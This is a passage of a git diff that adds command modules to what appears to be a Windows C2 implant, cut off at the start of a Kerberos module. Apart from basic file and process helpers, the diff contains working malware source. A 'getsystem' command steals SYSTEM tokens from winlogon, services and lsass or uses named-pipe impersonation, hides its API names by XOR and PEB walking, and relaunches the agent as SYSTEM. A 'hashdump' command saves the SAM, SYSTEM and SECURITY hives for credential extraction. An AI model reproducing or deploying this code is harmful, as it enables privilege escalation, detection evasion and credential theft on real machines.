memcpy(pattern, path, plen); + pattern[plen] = '\\'; + pattern[plen+1] = '*'; + pattern[plen+2] = '\0'; + } else { + strncpy(pattern, path, sizeof(pattern) - 1); + pattern[sizeof(pattern) - 1] = '\0'; + } + + WIN32_FIND_DATAA fd; + HANDLE h = FindFirstFileA(pattern, &fd); + if (h == INVALID_HANDLE_VALUE) { + snprintf(output_buf, output_size, + "[ls] %s: %lu\n", path, GetLastError()); + return -1; + } + + /* column header */ + size_t pos = 0; + int n = snprintf(output_buf + pos, output_size - pos, + "%-1s %-16s %12s %s\n", + "T", "Date modified", "Size", "Name"); + if (n > 0) pos += (size_t)n; + + do { + if (strcmp(fd.cFileName, ".") == 0 || strcmp(fd.cFileName, "..") == 0) + continue; + + int is_dir = (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) != 0; + char date[32]; + _ftime_str(&fd.ftLastWriteTime, date, sizeof(date)); + + ULONGLONG size_bytes = ((ULONGLONG)fd.nFileSizeHigh << 32) | fd.nFileSizeLow; + + if (is_dir) + n = snprintf(output_buf + pos, output_size - pos, + "d %-16s %12s %s\n", + date, "", fd.cFileName); + else + n = snprintf(output_buf + pos, output_size - pos, + "f %-16s %12llu %s\n", + date, size_bytes, fd.cFileName); + + if (n > 0 && (size_t)n < output_size - pos) + pos += (size_t)n; + else + break; /* buffer full */ + + } while (FindNextFileA(h, &fd)); + + FindClose(h); + return 0; +} + +/* create a directory */ + +int cmd_mkdir(const char *path, char *output_buf, size_t output_size) +{ + if (!path || !path[0]) { + snprintf(output_buf, output_size, "[mkdir] usage: mkdir \n"); + return -1; + } + if (CreateDirectoryA(path, NULL)) { + snprintf(output_buf, output_size, "[mkdir] created: %s\n", path); + return 0; + } + DWORD err = GetLastError(); + if (err == ERROR_ALREADY_EXISTS) { + snprintf(output_buf, output_size, "[mkdir] already exists: %s\n", path); + return 0; + } + snprintf(output_buf, output_size, + "[mkdir] failed: %s err=%lu\n", path, err); + return -1; +} + +/* delete a file or empty directory */ + +int cmd_rm(const char *path, char *output_buf, size_t output_size) +{ + if (!path || !path[0]) { + snprintf(output_buf, output_size, "[rm] usage: rm \n"); + return -1; + } + DWORD attr = GetFileAttributesA(path); + if (attr == INVALID_FILE_ATTRIBUTES) { + snprintf(output_buf, output_size, + "[rm] not found: %s\n", path); + return -1; + } + + BOOL ok; + if (attr & FILE_ATTRIBUTE_DIRECTORY) + ok = RemoveDirectoryA(path); + else + ok = DeleteFileA(path); + + if (ok) { + snprintf(output_buf, output_size, "[rm] deleted: %s\n", path); + return 0; + } + snprintf(output_buf, output_size, + "[rm] failed: %s err=%lu\n", path, GetLastError()); + return -1; +} + +/* ---- cp ---- */ + +int cmd_cp(const char *src, const char *dst, char *output_buf, size_t output_size) +{ + if (!src || !src[0] || !dst || !dst[0]) { + snprintf(output_buf, output_size, "[cp] usage: cp \n"); + return -1; + } + if (CopyFileA(src, dst, FALSE)) { + snprintf(output_buf, output_size, "[cp] %s -> %s\n", src, dst); + return 0; + } + snprintf(output_buf, output_size, + "[cp] failed: %s -> %s err=%lu\n", src, dst, GetLastError()); + return -1; +} + +/* ---- mv ---- */ + +int cmd_mv(const char *src, const char *dst, char *output_buf, size_t output_size) +{ + if (!src || !src[0] || !dst || !dst[0]) { + snprintf(output_buf, output_size, "[mv] usage: mv \n"); + return -1; + } + if (MoveFileExA(src, dst, MOVEFILE_REPLACE_EXISTING | MOVEFILE_COPY_ALLOWED)) { + snprintf(output_buf, output_size, "[mv] %s -> %s\n", src, dst); + return 0; + } + snprintf(output_buf, output_size, + "[mv] failed: %s -> %s err=%lu\n", src, dst, GetLastError()); + return -1; +} diff --git a/agent/src/commands/getpid.c b/agent/src/commands/getpid.c new file mode 100644 index 0000000..1612724 --- /dev/null +++ b/agent/src/commands/getpid.c @@ -0,0 +1,48 @@ +#include +#include +#include +#include + +int cmd_getpid(const char *name, char *out, size_t sz) +{ + if (!name || !name[0]) { + snprintf(out, sz, "[getpid] usage: getpid \n"); + return -1; + } + + HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snap == INVALID_HANDLE_VALUE) { + snprintf(out, sz, "[getpid] snapshot failed: %lu\n", GetLastError()); + return -1; + } + + PROCESSENTRY32 pe = { sizeof(pe) }; + size_t off = 0; + int found = 0; + + /* build name_exe: append .exe if not already present */ + char name_exe[MAX_PATH]; + strncpy(name_exe, name, sizeof(name_exe) - 5); + name_exe[sizeof(name_exe) - 5] = '\0'; + size_t nlen = strlen(name_exe); + if (nlen < 4 || _stricmp(name_exe + nlen - 4, ".exe") != 0) + strcat(name_exe, ".exe"); + + if (Process32First(snap, &pe)) do { + if (_stricmp(pe.szExeFile, name) == 0 || + _stricmp(pe.szExeFile, name_exe) == 0) { + int n = snprintf(out + off, sz - off, "%lu\t%s\n", + (unsigned long)pe.th32ProcessID, pe.szExeFile); + if (n > 0) off += (size_t)n; + found++; + } + } while (Process32Next(snap, &pe) && off < sz - 1); + + CloseHandle(snap); + + if (!found) { + snprintf(out, sz, "[getpid] no process named '%s'\n", name); + return -1; + } + return 0; +} diff --git a/agent/src/commands/getsystem.c b/agent/src/commands/getsystem.c new file mode 100644 index 0000000..91ed47f --- /dev/null +++ b/agent/src/commands/getsystem.c @@ -0,0 +1,560 @@ +#include "evasion.h" +#include "inject.h" +#include "beacon.h" +#include "evs_strings.h" +#include "peb_walk.h" +#include "adv_lazy.h" +#include +#include +#include +#include +#include + +/* GetComputerNameW */ +typedef BOOL(WINAPI *_GCNW_t)(LPWSTR, LPDWORD); +static BOOL _gcnw(LPWSTR buf, LPDWORD sz) +{ + static _GCNW_t fn = NULL; + if (!fn) + { + char fs[20], ks[14]; + volatile unsigned char xk = EVS_KEY; + for (int i = 0; i < (int)sizeof(EVS_fn_GetComputerNameW); i++) + fs[i] = (char)(EVS_fn_GetComputerNameW[i] ^ xk); + fs[sizeof(EVS_fn_GetComputerNameW)] = '\0'; + for (int i = 0; i < (int)sizeof(EVS_dll_kernel32); i++) + ks[i] = (char)(EVS_dll_kernel32[i] ^ xk); + ks[sizeof(EVS_dll_kernel32)] = '\0'; + HMODULE m = _peb_module(ks); + SecureZeroMemory(ks, sizeof(ks)); + if (m) + fn = (_GCNW_t)(void *)GetProcAddress(m, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + return fn ? fn(buf, sz) : FALSE; +} + +/* All advapi32 / kernel32 token/pipe APIs resolved at runtime. */ +typedef BOOL(WINAPI *fn_OpenProcessToken_t)(HANDLE, DWORD, PHANDLE); +typedef BOOL(WINAPI *fn_OpenThreadToken_t)(HANDLE, DWORD, BOOL, PHANDLE); +typedef BOOL(WINAPI *fn_DuplicateTokenEx_t)(HANDLE, DWORD, LPSECURITY_ATTRIBUTES, SECURITY_IMPERSONATION_LEVEL, TOKEN_TYPE, PHANDLE); +typedef BOOL(WINAPI *fn_GetTokenInformation_t)(HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD, PDWORD); +typedef BOOL(WINAPI *fn_SetThreadToken_t)(PHANDLE, HANDLE); +typedef BOOL(WINAPI *fn_RevertToSelf_t)(void); +typedef BOOL(WINAPI *fn_LookupPrivilegeValueA_t)(LPCSTR, LPCSTR, PLUID); +typedef BOOL(WINAPI *fn_PrivilegeCheck_t)(HANDLE, PPRIVILEGE_SET, LPBOOL); +typedef BOOL(WINAPI *fn_AllocateAndInitializeSid_t)(PSID_IDENTIFIER_AUTHORITY, BYTE, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, PSID *); +typedef BOOL(WINAPI *fn_EqualSid_t)(PSID, PSID); +typedef PVOID(WINAPI *fn_FreeSid_t)(PSID); +typedef BOOL(WINAPI *fn_ImpersonateNamedPipeClient_t)(HANDLE); +typedef HANDLE(WINAPI *fn_CreateNamedPipeA_t)(LPCSTR, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, LPSECURITY_ATTRIBUTES); +typedef BOOL(WINAPI *fn_ConnectNamedPipe_t)(HANDLE, LPOVERLAPPED); +typedef BOOL(WINAPI *fn_CreateProcessWithTokenW_t)(HANDLE, DWORD, LPCWSTR, LPWSTR, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION); +typedef BOOL(WINAPI *fn_CreateProcessAsUserW_t)(HANDLE, LPCWSTR, LPWSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION); + +typedef struct +{ + fn_OpenProcessToken_t OpenProcessToken; + fn_OpenThreadToken_t OpenThreadToken; + fn_DuplicateTokenEx_t DuplicateTokenEx; + fn_GetTokenInformation_t GetTokenInformation; + fn_SetThreadToken_t SetThreadToken; + fn_RevertToSelf_t RevertToSelf; + fn_LookupPrivilegeValueA_t LookupPrivilegeValueA; + fn_PrivilegeCheck_t PrivilegeCheck; + fn_AllocateAndInitializeSid_t AllocateAndInitializeSid; + fn_EqualSid_t EqualSid; + fn_FreeSid_t FreeSid; + fn_ImpersonateNamedPipeClient_t ImpersonateNamedPipeClient; + fn_CreateNamedPipeA_t CreateNamedPipeA; + fn_ConnectNamedPipe_t ConnectNamedPipe; + fn_CreateProcessWithTokenW_t CreateProcessWithTokenW; + fn_CreateProcessAsUserW_t CreateProcessAsUserW; +} gs_api_t; + +static int _resolve_apis(gs_api_t *api) +{ + /* APIs already EVS-resolved by adv_lazy — reuse, no duplicate resolution */ + const adv_api_t *adv = adv_get(); + if (!adv) return -1; + api->OpenProcessToken = adv->OpenProcessToken; + api->OpenThreadToken = adv->OpenThreadToken; + api->DuplicateTokenEx = adv->DuplicateTokenEx; + api->LookupPrivilegeValueA = adv->LookupPrivilegeValueA; + api->RevertToSelf = adv->RevertToSelf; + + /* Module handles via EVS-decoded names + PEB walk — no plaintext in binary */ + char dll_a[13], dll_k[13]; + EVS_D(dll_a, EVS_dll_advapi32); + EVS_D(dll_k, EVS_dll_kernel32); + HMODULE had = _peb_module(dll_a); + HMODULE hk32 = _peb_module(dll_k); + SecureZeroMemory(dll_a, sizeof(dll_a)); + SecureZeroMemory(dll_k, sizeof(dll_k)); + if (!had || !hk32) return -1; + + /* Remaining APIs — EVS XOR bytes at rest, decoded to stack, cleared after use */ + char fn[28]; + + EVS_D(fn, EVS_fn_GetTokenInformation); + api->GetTokenInformation = (fn_GetTokenInformation_t)(void *)GetProcAddress(had, fn); + SecureZeroMemory(fn, sizeof(fn)); + + EVS_D(fn, EVS_fn_SetThreadToken); + api->SetThreadToken = (fn_SetThreadToken_t)(void *)GetProcAddress(had, fn); + SecureZeroMemory(fn, sizeof(fn)); + + EVS_D(fn, EVS_fn_PrivilegeCheck); + api->PrivilegeCheck = (fn_PrivilegeCheck_t)(void *)GetProcAddress(had, fn); + SecureZeroMemory(fn, sizeof(fn)); + + EVS_D(fn, EVS_fn_AllocateAndInitializeSid); + api->AllocateAndInitializeSid = (fn_AllocateAndInitializeSid_t)(void *)GetProcAddress(had, fn); + SecureZeroMemory(fn, sizeof(fn)); + + EVS_D(fn, EVS_fn_EqualSid); + api->EqualSid = (fn_EqualSid_t)(void *)GetProcAddress(had, fn); + SecureZeroMemory(fn, sizeof(fn)); + + EVS_D(fn, EVS_fn_FreeSid); + api->FreeSid = (fn_FreeSid_t)(void *)GetProcAddress(had, fn); + SecureZeroMemory(fn, sizeof(fn)); + + EVS_D(fn, EVS_fn_ImpersonateNamedPipeClient); + api->ImpersonateNamedPipeClient = (fn_ImpersonateNamedPipeClient_t)(void *)GetProcAddress(had, fn); + SecureZeroMemory(fn, sizeof(fn)); + + EVS_D(fn, EVS_fn_CreateProcessWithTokenW); + api->CreateProcessWithTokenW = (fn_CreateProcessWithTokenW_t)(void *)GetProcAddress(had, fn); + SecureZeroMemory(fn, sizeof(fn)); + + EVS_D(fn, EVS_fn_CreateProcessAsUserW); + api->CreateProcessAsUserW = (fn_CreateProcessAsUserW_t)(void *)GetProcAddress(had, fn); + SecureZeroMemory(fn, sizeof(fn)); + + EVS_D(fn, EVS_fn_CreateNamedPipeA); + api->CreateNamedPipeA = (fn_CreateNamedPipeA_t)(void *)GetProcAddress(hk32, fn); + SecureZeroMemory(fn, sizeof(fn)); + + EVS_D(fn, EVS_fn_ConnectNamedPipe); + api->ConnectNamedPipe = (fn_ConnectNamedPipe_t)(void *)GetProcAddress(hk32, fn); + SecureZeroMemory(fn, sizeof(fn)); + + return (api->OpenProcessToken && api->DuplicateTokenEx && + api->ImpersonateNamedPipeClient && api->CreateNamedPipeA) + ? 0 : -1; +} + +static int _is_system_sid(gs_api_t *api, HANDLE hToken) +{ + BYTE buf[256]; + DWORD cb = sizeof(buf); + if (!api->GetTokenInformation(hToken, TokenUser, buf, cb, &cb)) + return 0; + TOKEN_USER *tu = (TOKEN_USER *)buf; + PSID sys = NULL; + SID_IDENTIFIER_AUTHORITY auth = SECURITY_NT_AUTHORITY; + if (!api->AllocateAndInitializeSid(&auth, 1, SECURITY_LOCAL_SYSTEM_RID, + 0, 0, 0, 0, 0, 0, 0, &sys)) + return 0; + int r = api->EqualSid(tu->User.Sid, sys); + api->FreeSid(sys); + return r; +} + +/* Method 1: token theft from a SYSTEM process */ + +static int _steal_system_token(gs_api_t *api, HANDLE *out, char *buf, size_t sz) +{ + volatile unsigned char _k = EVS_KEY; + char t0[13], t1[13], t2[12], t3[10]; + for (int _i = 0; _i < (int)sizeof(EVS_str_winlogon_exe); _i++) + t0[_i] = (char)(EVS_str_winlogon_exe[_i] ^ _k); + t0[sizeof(EVS_str_winlogon_exe)] = 0; + for (int _i = 0; _i < (int)sizeof(EVS_str_services_exe); _i++) + t1[_i] = (char)(EVS_str_services_exe[_i] ^ _k); + t1[sizeof(EVS_str_services_exe)] = 0; + for (int _i = 0; _i < (int)sizeof(EVS_str_spoolsv_exe); _i++) + t2[_i] = (char)(EVS_str_spoolsv_exe[_i] ^ _k); + t2[sizeof(EVS_str_spoolsv_exe)] = 0; + for (int _i = 0; _i < (int)sizeof(EVS_str_lsass_exe); _i++) + t3[_i] = (char)(EVS_str_lsass_exe[_i] ^ _k); + t3[sizeof(EVS_str_lsass_exe)] = 0; + const char *targets[] = {t0, t1, t2, t3, NULL}; + + HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snap == INVALID_HANDLE_VALUE) + return -1; + + PROCESSENTRY32 pe = {sizeof(pe)}; + int found = 0; + + if (Process32First(snap, &pe)) + do + { + int hit = 0; + for (int i = 0; targets[i]; i++) + if (_stricmp(pe.szExeFile, targets[i]) == 0) + { + hit = 1; + break; + } + if (!hit) + continue; + + /* indirect NtOpenProcess */ + HANDLE hp = inject_nt_open_process(pe.th32ProcessID, PROCESS_QUERY_INFORMATION); + if (!hp) + continue; + + HANDLE ht = NULL; + if (!api->OpenProcessToken(hp, TOKEN_DUPLICATE | TOKEN_QUERY, &ht)) + { + CloseHandle(hp); + continue; + } + CloseHandle(hp); + + if (!_is_system_sid(api, ht)) + { + CloseHandle(ht); + continue; + } + + HANDLE hdup = NULL; + SECURITY_ATTRIBUTES sa = {sizeof(sa), NULL, FALSE}; + BOOL ok = api->DuplicateTokenEx(ht, TOKEN_ALL_ACCESS, &sa, + SecurityImpersonation, TokenImpersonation, &hdup); + CloseHandle(ht); + if (!ok) + continue; + + *out = hdup; + snprintf(buf, sz, "ok:t %lu\n", (unsigned long)pe.th32ProcessID); + found = 1; + break; + } while (Process32Next(snap, &pe)); + + CloseHandle(snap); + return found ? 0 : -1; +} + +/* Method 2: named pipe impersonation (PrintSpoofer-style) */ + +typedef struct +{ + gs_api_t *api; + HANDLE pipe; + HANDLE token; + volatile int done; +} _pipe_ctx; + +static DWORD WINAPI _pipe_thread(LPVOID p) +{ + evasion_apply_thread(GetCurrentThread()); + + _pipe_ctx *ctx = (_pipe_ctx *)p; + gs_api_t *api = ctx->api; + + if (!api->ConnectNamedPipe(ctx->pipe, NULL) && + GetLastError() != ERROR_PIPE_CONNECTED) + { + ctx->done = -1; + return 0; + } + + if (!api->ImpersonateNamedPipeClient(ctx->pipe)) + { + ctx->done = -1; + return 0; + } + + HANDLE ht = NULL; + if (!api->OpenThreadToken(GetCurrentThread(), TOKEN_DUPLICATE | TOKEN_QUERY, FALSE, &ht)) + { + api->RevertToSelf(); + ctx->done = -1; + return 0; + } + + SECURITY_ATTRIBUTES sa = {sizeof(sa), NULL, FALSE}; + api->DuplicateTokenEx(ht, TOKEN_ALL_ACCESS, &sa, + SecurityImpersonation, TokenImpersonation, &ctx->token); + CloseHandle(ht); + api->RevertToSelf(); + ctx->done = 1; + return 0; +} + +static int _pipe_impersonate(gs_api_t *api, HANDLE *out, char *buf, size_t sz) +{ + DWORD tick = GetTickCount(); + + char pipe_a[128]; + snprintf(pipe_a, sizeof(pipe_a), + "\\\\.\\pipe\\svc%04lx\\pipe\\spoolss", tick & 0xFFFF); + + HANDLE hp = api->CreateNamedPipeA(pipe_a, + PIPE_ACCESS_DUPLEX | FILE_FLAG_OVERLAPPED, + PIPE_TYPE_BYTE | PIPE_WAIT, 1, 4096, 4096, 0, NULL); + if (hp == INVALID_HANDLE_VALUE) + { + snprintf(buf, sz, "e:np %lu\n", GetLastError()); + return -1; + } + + /* heap-allocate ctx so the thread never touches freed stack */ + _pipe_ctx *ctx = (_pipe_ctx *)calloc(1, sizeof(_pipe_ctx)); + if (!ctx) + { + CloseHandle(hp); + return -1; + } + ctx->api = api; + ctx->pipe = hp; + + HANDLE ht = CreateThread(NULL, 0, _pipe_thread, ctx, 0, NULL); + if (!ht) + { + CloseHandle(hp); + free(ctx); + return -1; + } + + char dll_ws[13], fn_opw[13], fn_cpr[13]; + EVS_D(dll_ws, EVS_dll_winspool); + HMODULE hw = LoadLibraryA(dll_ws); + SecureZeroMemory(dll_ws, sizeof(dll_ws)); + if (hw) + { + typedef BOOL(WINAPI * fnOPW)(LPWSTR, HANDLE *, LPVOID); + typedef BOOL(WINAPI * fnCPR)(HANDLE); + EVS_D(fn_opw, EVS_fn_OpenPrinterW); + EVS_D(fn_cpr, EVS_fn_ClosePrinter); + fnOPW pOPW = (fnOPW)(void *)GetProcAddress(hw, fn_opw); + fnCPR pCPR = (fnCPR)(void *)GetProcAddress(hw, fn_cpr); + SecureZeroMemory(fn_opw, sizeof(fn_opw)); + SecureZeroMemory(fn_cpr, sizeof(fn_cpr)); + if (pOPW) + { + wchar_t host[MAX_COMPUTERNAME_LENGTH + 2]; + DWORD hsz = MAX_COMPUTERNAME_LENGTH + 1; + _gcnw(host, &hsz); + wchar_t trigger[256]; + _snwprintf(trigger, 256, L"\\\\%s/pipe/svc%04lx", host, tick & 0xFFFF); + HANDLE hpr = NULL; + pOPW(trigger, &hpr, NULL); + if (hpr && pCPR) + pCPR(hpr); + } + FreeLibrary(hw); + } + + /* wait for thread; terminate if it didn't finish in time */ + DWORD w = WaitForSingleObject(ht, 3000); + if (w != WAIT_OBJECT_0) + TerminateThread(ht, 0); + CloseHandle(ht); + CloseHandle(hp); + + HANDLE tok = ctx->token; + int done = ctx->done; + free(ctx); + + if (done != 1 || !tok) + { + snprintf(buf, sz, "e:pipe\n"); + if (tok) + CloseHandle(tok); + return -1; + } + *out = tok; + snprintf(buf, sz, "ok:p\n"); + return 0; +} + +/* Method 3: spawn agent as SYSTEM via primary token */ + +static int _spawn_as_system(gs_api_t *api, HANDLE hImpTok, char *buf, size_t sz) +{ + if (!api->CreateProcessWithTokenW && !api->CreateProcessAsUserW) + return -1; + + /* Duplicate impersonation token to primary token */ + HANDLE hPrim = NULL; + SECURITY_ATTRIBUTES sa = {sizeof(sa), NULL, FALSE}; + if (!api->DuplicateTokenEx(hImpTok, TOKEN_ALL_ACCESS, &sa, + SecurityImpersonation, TokenPrimary, &hPrim)) + { + size_t off = strlen(buf); + snprintf(buf + off, sz - off, + "[gs] dup→primary failed: %lu\n", GetLastError()); + return -1; + } + + WCHAR exe[MAX_PATH] = {0}; + GetModuleFileNameW(NULL, exe, MAX_PATH); + + /* Tag child so C2 links it to this session. No gs_flagchild is already SYSTEM. */ + char own_id[AGENT_ID_LEN + 1]; + agent_gen_id(own_id); + agent_write_parent_id(own_id); + + STARTUPINFOW si = {sizeof(si)}; + si.dwFlags = STARTF_USESHOWWINDOW; + si.wShowWindow = SW_HIDE; + PROCESS_INFORMATION pi = {0}; + + BOOL ok = FALSE; + DWORD flags = CREATE_NO_WINDOW | CREATE_NEW_PROCESS_GROUP; + + if (api->CreateProcessWithTokenW) + ok = api->CreateProcessWithTokenW( + hPrim, LOGON_WITH_PROFILE, exe, NULL, flags, NULL, NULL, &si, &pi); + + if (!ok && api->CreateProcessAsUserW) + { + /* LOGON_WITH_PROFILE not needed for CreateProcessAsUserW */ + HANDLE hPrim2 = NULL; + if (api->DuplicateTokenEx(hImpTok, TOKEN_ALL_ACCESS, &sa, + SecurityImpersonation, TokenPrimary, &hPrim2)) + { + ok = api->CreateProcessAsUserW( + hPrim2, exe, NULL, NULL, NULL, FALSE, flags, NULL, NULL, &si, &pi); + CloseHandle(hPrim2); + } + } + + CloseHandle(hPrim); + + if (!ok) + { + size_t off = strlen(buf); + snprintf(buf + off, sz - off, "e:cp %lu\n", GetLastError()); + return -1; + } + + if (pi.hProcess) + CloseHandle(pi.hProcess); + if (pi.hThread) + CloseHandle(pi.hThread); + size_t off = strlen(buf); + snprintf(buf + off, sz - off, "ok:s %lu\n", (unsigned long)pi.dwProcessId); + return 0; +} + +/* AlwaysInstallElevated check */ + +static void _check_aie(char *buf, size_t sz) +{ + volatile unsigned char _k = EVS_KEY; + char _rp[52], _rv[22]; + for (int _i = 0; _i < (int)sizeof(EVS_str_reg_installer_policy); _i++) + _rp[_i] = (char)(EVS_str_reg_installer_policy[_i] ^ _k); + _rp[sizeof(EVS_str_reg_installer_policy)] = '\0'; + for (int _i = 0; _i < (int)sizeof(EVS_str_AlwaysInstallElevated); _i++) + _rv[_i] = (char)(EVS_str_AlwaysInstallElevated[_i] ^ _k); + _rv[sizeof(EVS_str_AlwaysInstallElevated)] = '\0'; + + DWORD hklm = 0, hkcu = 0, cb = sizeof(DWORD); + RegGetValueA(HKEY_LOCAL_MACHINE, _rp, _rv, RRF_RT_REG_DWORD, NULL, &hklm, &cb); + cb = sizeof(DWORD); + RegGetValueA(HKEY_CURRENT_USER, _rp, _rv, RRF_RT_REG_DWORD, NULL, &hkcu, &cb); + SecureZeroMemory(_rp, sizeof(_rp)); + SecureZeroMemory(_rv, sizeof(_rv)); + + size_t off = strlen(buf); + if (off >= sz - 1) + return; + if (hklm == 1 && hkcu == 1) + { + char _t1[] = {'[', 'g', 's', ']', ' ', 'A', 'I', 'E', '=', 'V', 'U', 'L', 'N', + 'E', 'R', 'A', 'B', 'L', 'E', ' ', '(', 'H', 'K', 'L', 'M', '+', + 'H', 'K', 'C', 'U', '=', '1', ')', '\n', 0}; + snprintf(buf + off, sz - off, "%s", _t1); + } + else + snprintf(buf + off, sz - off, + "[gs] AIE=no (HKLM=%lu HKCU=%lu)\n", + hklm, hkcu); +} + +int cmd_getsystem(const char *args, char *out, size_t sz) +{ + (void)args; + memset(out, 0, sz); + + gs_api_t api; + if (_resolve_apis(&api) != 0) + { + snprintf(out, sz, "e:api\n"); + return -1; + } + + /* check SeImpersonatePrivilege */ + { + HANDLE htok = NULL; + if (api.OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &htok)) + { + LUID luid = {0}; + char _sp[24]; + volatile unsigned char _k = EVS_KEY; + for (int _i = 0; _i < (int)sizeof(EVS_str_SeImpersonatePrivilege); _i++) + _sp[_i] = (char)(EVS_str_SeImpersonatePrivilege[_i] ^ _k); + _sp[sizeof(EVS_str_SeImpersonatePrivilege)] = '\0'; + api.LookupPrivilegeValueA(NULL, _sp, &luid); + SecureZeroMemory(_sp, sizeof(_sp)); + PRIVILEGE_SET ps; + ps.PrivilegeCount = 1; + ps.Control = 0; + ps.Privilege[0].Luid = luid; + ps.Privilege[0].Attributes = 0; + BOOL has = FALSE; + api.PrivilegeCheck(htok, &ps, &has); + CloseHandle(htok); + if (!has) + { + char _nm[] = {'[', 'g', 's', ']', ' ', 'S', 'e', 'I', 'm', 'p', 'e', 'r', 's', 'o', + 'n', 'a', 't', 'e', ' ', 'n', 'o', 't', ' ', 'h', 'e', 'l', 'd', '\n', 0}; + snprintf(out, sz, "%s", _nm); + _check_aie(out, sz); + return -1; + } + } + } + + evasion_apply_thread(GetCurrentThread()); + + HANDLE sys_tok = NULL; + int rc = _steal_system_token(&api, &sys_tok, out, sz); + if (rc != 0) + rc = _pipe_impersonate(&api, &sys_tok, out, sz); + + if (rc == 0 && sys_tok) + { + /* Primary: spawn agent with primary SYSTEM token (bypasses GPO/AppLocker) */ + int spawn_rc = _spawn_as_system(&api, sys_tok, out, sz); + + /* Also apply thread impersonation so current session is SYSTEM */ + api.SetThreadToken(NULL, sys_tok); + CloseHandle(sys_tok); + + if (spawn_rc == 0) + { + size_t off = strlen(out); + if (off < sz - 1) + snprintf(out + off, sz - off, "ok\n"); + return 0; + } + size_t off = strlen(out); + if (off < sz - 1) + snprintf(out + off, sz - off, "ok:thr\n"); + return 0; + } + + size_t off = strlen(out); + if (off < sz - 1) + snprintf(out + off, sz - off, "e:all\n"); + _check_aie(out, sz); + return -1; +} diff --git a/agent/src/commands/hashdump.c b/agent/src/commands/hashdump.c new file mode 100644 index 0000000..449fc4f --- /dev/null +++ b/agent/src/commands/hashdump.c @@ -0,0 +1,122 @@ +#include "commands.h" +#include "adv_lazy.h" +#include +#include +#include + +static int _save_hive(HKEY root, const char *subkey, + const char *out_path, + char *msg, size_t msgsz) +{ + /* remove existing file first (RegSaveKeyA fails if it exists) */ + DeleteFileA(out_path); + + HKEY hk = NULL; + LONG rc = RegOpenKeyExA(root, subkey, 0, KEY_READ, &hk); + if (rc != ERROR_SUCCESS) { + snprintf(msg, msgsz, "[hd] RegOpenKeyEx(%s) failed: %ld\n", + subkey, rc); + return -1; + } + + rc = RegSaveKeyA(hk, out_path, NULL); + RegCloseKey(hk); + + if (rc != ERROR_SUCCESS) { + snprintf(msg, msgsz, "[hd] RegSaveKey(%s) failed: %ld\n", + subkey, rc); + return -1; + } + + LARGE_INTEGER sz = {0}; + HANDLE hf = CreateFileA(out_path, GENERIC_READ, FILE_SHARE_READ, + NULL, OPEN_EXISTING, 0, NULL); + if (hf != INVALID_HANDLE_VALUE) { + GetFileSizeEx(hf, &sz); + CloseHandle(hf); + } + + snprintf(msg, msgsz, " %-10s → %s (%llu bytes)\n", + subkey, out_path, (unsigned long long)sz.QuadPart); + return 0; +} + +int cmd_hashdump(const char *dir, char *output_buf, size_t output_size) +{ + char out_dir[MAX_PATH]; + if (dir && dir[0]) { + strncpy(out_dir, dir, sizeof(out_dir) - 1); + out_dir[sizeof(out_dir) - 1] = '\0'; + } else { + GetTempPathA(sizeof(out_dir), out_dir); + } + /* strip trailing backslash */ + size_t dlen = strlen(out_dir); + if (dlen > 0 && out_dir[dlen - 1] == '\\') + out_dir[--dlen] = '\0'; + + /* SeBackupPrivilege LUID={17,0}, SeSecurityPrivilege LUID={8,0} — constant on all NT */ + { + const adv_api_t *_a = adv_get(); + HANDLE _tok = NULL; + if (_a->OpenProcessToken && _a->AdjustTokenPrivileges && + _a->OpenProcessToken(GetCurrentProcess(), + TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &_tok)) { + TOKEN_PRIVILEGES _tp; + _tp.PrivilegeCount = 1; + _tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; + _tp.Privileges[0].Luid.LowPart = 17; _tp.Privileges[0].Luid.HighPart = 0; + _a->AdjustTokenPrivileges(_tok, FALSE, &_tp, 0, NULL, NULL); + _tp.Privileges[0].Luid.LowPart = 8; + _a->AdjustTokenPrivileges(_tok, FALSE, &_tp, 0, NULL, NULL); + CloseHandle(_tok); + } + } + + char sam_path[MAX_PATH], sys_path[MAX_PATH], sec_path[MAX_PATH]; + snprintf(sam_path, sizeof(sam_path), "%s\\sam.hive", out_dir); + snprintf(sys_path, sizeof(sys_path), "%s\\system.hive", out_dir); + snprintf(sec_path, sizeof(sec_path), "%s\\security.hive", out_dir); + + size_t pos = 0; + int n = snprintf(output_buf + pos, output_size - pos, + "[hd] saving hives to %s\n", out_dir); + if (n > 0) pos += (size_t)n; + + static const struct { HKEY root; const char *key; } hives[] = { + {HKEY_LOCAL_MACHINE, "SAM"}, + {HKEY_LOCAL_MACHINE, "SYSTEM"}, + {HKEY_LOCAL_MACHINE, "SECURITY"}, + }; + static const char *paths[] = {NULL, NULL, NULL}; + /* assign at runtime */ + char *ppaths[3]; + ppaths[0] = sam_path; + ppaths[1] = sys_path; + ppaths[2] = sec_path; + + int any_ok = 0; + for (int i = 0; i < 3; i++) { + char msg[512]; + int rc = _save_hive(hives[i].root, hives[i].key, ppaths[i], + msg, sizeof(msg)); + n = snprintf(output_buf + pos, output_size - pos, "%s", msg); + if (n > 0) pos += (size_t)n; + if (rc == 0) any_ok++; + } + + if (any_ok == 0) { + n = snprintf(output_buf + pos, output_size - pos, + "[hd] all failed - try st on a SYSTEM process first\n"); + if (n > 0) pos += (size_t)n; + return -1; + } + + n = snprintf(output_buf + pos, output_size - pos, + "[hd] extract creds:\n" + " secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL\n"); + if (n > 0) pos += (size_t)n; + + (void)paths; + return 0; +} diff --git a/agent/src/commands/kerberos.c b/agent/src/commands/kerberos.c new file mode 100644 index 0000000..e6b9f1c --- /dev/null +++ b/agent/src/commands/kerberos.c @@ -0,0 +1,1149 @@ +#include "commands.h" +#include "evs_strings.h" +#include "peb_walk.h" 